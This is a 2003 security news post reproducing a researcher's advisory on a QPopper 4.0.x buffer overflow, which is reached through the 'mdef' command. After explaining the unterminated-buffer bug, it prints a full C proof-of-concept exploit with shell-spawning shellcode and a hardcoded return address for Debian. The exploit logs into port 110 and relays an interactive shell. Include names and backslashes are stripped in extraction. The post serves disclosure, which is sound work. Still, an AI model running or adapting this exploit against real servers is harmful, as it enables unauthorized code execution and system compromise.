Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » QPopper 4.0.x buffer overflow vulnerability

QPopper 4.0.x buffer overflow vulnerability

by Nikola Strahija on March 12th, 2003 Under certain conditions it is possible to execute arbitrary code using a buffer overflow in the recent qpopper. You need a valid username/password-combination and code is (depending on the setup) usually executed with the user's uid and gid mail.


Qualcomm provides their own vsnprintf-implementation Qvsnprintf(). This
function is used unconditionally on any system, regardless if the system
has its own vsnprintf().
The function correctly writes up to 'n' bytes into the buffer, but fails
to null-terminate it, if buffer-space runs out while copying the
format-string (so the obvious fix is, null-terminate the buffer in
Qvsnprintf()).
This is a problem in pop_msg() (popper/pop_msg.c).
The call to Qvsnprintf() can leave the buffer 'message' unterminated, so
the successive call to strcat (strcat(message,"rn")) writes somewhere
into thew stack. What it exactly overwrites depends heavily on the
individual binary and the current stack-data (where is the next
null-byte).

Sending 'mdef ()' with a macro-name of about 1000 bytes
fills the buffer leaving it unterminated. The strcat overwrites the
least significant byte of the saved basepointer on the stack,
now pointing inside the buffer. On return of pop_mdef() (file
pop_extend.c), the return-address is now fetched from within our buffer
(and of course pointing inside our buffer), allowing to, for example,
spawn a shell.
The Macroname may not include bytes causing isspace() to return true
and, of course, no null-byte, so shellcode must be appropriate crafted.

Here is a POC-exploit, Values for RETADDR and BUFSIZE adjusted for
debian qpopper-4.0.4-8:

-- snip --


#include
#include
#include
#include
#include
#include
#include
#include

char *sc = "x31xc0x31xdbxb0x17xcdx80x31xc0x50x68x2fx2fx73x68"
"x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x08x40"
"x40x40xcdx80";

#define BUFLEN 1006
#define RETLEN 148
#define RETADDR 0xbfffd304

int main (int argc, char **argv) {
int fd, len, i, retaddr = RETADDR;
char *bp, buf[2000];
struct sockaddr_in peer;
fd_set fs;

if (argc != 4) {
fprintf(stderr, "Usage: %s nn", argv[0]);
exit(EXIT_FAILURE);
}

peer.sin_family = AF_INET;
peer.sin_port = htons(110);
peer.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
if (connect(fd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
exit(EXIT_FAILURE);
}
snprintf(buf, 1024, "USER %sn", argv[2]);
write(fd, buf, strlen(buf));
snprintf(buf, 1024, "PASS %sn", argv[3]);
write(fd, buf, strlen(buf));
memset(buf, 0x90, 2000);
memcpy(buf, "mdef ", 5);
memcpy(buf + BUFLEN - RETLEN - strlen(sc), sc, strlen(sc));
bp = (char *) (((unsigned int)(buf + BUFLEN - RETLEN)) & 0xfffffffc);
for (i = 0; i < RETLEN; i += 4)
memcpy(bp+i+2, &retaddr, sizeof(int));
buf[BUFLEN-2] = '(';
buf[BUFLEN-1] = ')';
buf[BUFLEN] = 'n';
write(fd, buf, BUFLEN+1);
while (1) {
FD_ZERO(&fs);
FD_SET(0, &fs);
FD_SET(fd, &fs);
select(fd+1, &fs, NULL, NULL, NULL);
if (FD_ISSET(0, &fs)) {
if ((len = read(0, buf, 1000)) <= 0)
break;
write(fd, buf, len);
} else {
if ((len = read(fd, buf, 1000)) <= 0)
break;
write(1, buf, len);
}
}

exit(EXIT_SUCCESS);
}

-- snap --

This is the short version. An enhanced version with error-checking,
bufsize- and return-address autodetection can be found on
http://nstx.dereference.de/snippets/qex.c

Florian Heinz
Cronon AG
http://www.cronon.org


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »